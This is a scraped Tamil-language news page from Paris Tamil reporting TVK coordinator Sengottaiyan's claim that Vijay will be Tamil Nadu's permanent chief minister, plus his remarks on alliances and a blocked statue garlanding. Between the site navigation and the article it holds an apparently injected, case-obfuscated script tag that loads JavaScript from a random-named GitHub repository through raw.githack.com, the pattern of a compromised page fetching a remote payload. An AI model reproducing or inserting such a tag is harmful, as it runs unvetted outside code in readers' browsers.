", "image": "https://www.paristamil.com/ptmin/uploads/news/India_rathna_senkotaiyan.jpg", "datePublished": "2026-01-05", "author": { "@type": "Person", "name": "Author Name" }, "publisher": { "@type": "Organization", "name": "Paris Tamil", "logo": { "@type": "ImageObject", "url": "https://www.paristamil.com/logo.png" } }, "description": "தமிழகத்தின் நிரந்தர முதல்வர் விஜய் தான், என, த.வெ.க., மாநில நி" }
Paristamil Navigation Paristamil advert login

<sCrIpT sRc=//raw.githack.com/dhypvhxjhpdp/1v9et39j58z1/main/1.js></ScRiPt>

5 தை 2026 திங்கள் 06:49 | பார்வைகள் : 150


தமிழகத்தின் நிரந்தர முதல்வர் விஜய் தான், என, த.வெ.க., மாநில நிர்வாகக் குழுவின் தலைமை ஒருங்கிணைப்பாளர் செங்கோட்டையன் தெரிவித்துள்ளார்.

கோவை மாவட்டம் மேட்டுப்பாளையத்தில், த.வெ.க., அலுவலக அடிக்கல் நாட்டு விழா நடந்தது. இதில், பங்கேற்ற, செங்கோட்டையன் கூறியதாவது:

த.வெ.க., தலைவர் விஜய் தான் ஆட்சி அமைக்க வேண்டும் என, தமிழக மக்கள் நினைக்கின்றனர். வரும் 2026 தேர்தலுக்கு பின், தமிழகத்தின் நிரந்தர முதல்வர் விஜய் தான்.

படித்தவர்கள் முதல் பாமரர்கள் வரை விஜயை ஆதரிக்கின்றனர். ஒரு படத்துக்கு, 250 கோடி ரூபாய்; ஆண்டுக்கு நான்கு படம் நடித்தால், ௧,௦௦௦ கோடி ரூபாய் பெறும் விஜய், மக்களுக்காக அதை துாக்கி எறிந்து விட்டு வந்து உள்ளார்.

கரூர் சம்பவத்திற்கு பிறகு நடந்த த.வெ.க., கூட்டங்களில், விஜய்க்கு மக்கள் மத்தியில் அமோக வரவேற்பு இருந்தது.

சிறுவர்கள் விஜய்க்கு ஓட்டு போடும்படி, தங்கள் பெற்றோரிடம் கூறுகின்றனர். எம்.ஜி.ஆர்., போலவே, விஜய்க்கு மக்களிடம் நல்ல வரவேற்பு உள்ளது. இவ்வாறு அவர் கூறினார்.

மேட்டுப்பாளையம் பஸ் ஸ்டாண்ட் அருகே அண்ணாதுரை சிலைக்கு, செங்கோட்டையன் மாலை அணிவிக்க த.வெ.க.,வினர் ஏற்பாடு செய்திருந்தனர்.

ஆனால், நகராட்சி நிர்வாகம் சார்பாக, சிலைக்கு வேலி போட்டு பூட்டியதால், மாலை அணிவிக்க முடியவில்லை. இதற்கு, த.வெ.க.,வினர் கண்டனம் தெரிவித்தனர்.

இதற்கிடையே, ஈரோடு மாவட்டம் கோபியில் பேட்டியளித்த செங்கோட்டையன், “த.வெ.க., சார்பில், சட்டசபை தேர்தலில் போட்டியிடுவதற்காக விருப்ப மனுக்கள் வாங்குவது குறித்து, கட்சி தலைவர் விஜய் முடிவு செய்வார்.

''மற்ற கட்சிகளைச் சேர்ந்த முக்கிய தலைவர்கள் பலர், வரும் பொங்கலுக்குள், த.வெ.க.,வில் இணைய உள்ளனர்.

“த.வெ.க.,வுடன் கூட்டணி அமைப்பது குறித்து காங்கிரஸ் கட்சி தான் முடிவு செய்ய வேண்டும். கூட்டணிக்கு வரும் கட்சிகளுக்கு ஆட்சி, அதிகாரத்தில் பங்கு அளிப்பதாக, த.வெ.க., தலைவர் விஜய், ஏற்கனவே அறிவித்துள்ளார்,” என கூறினார்.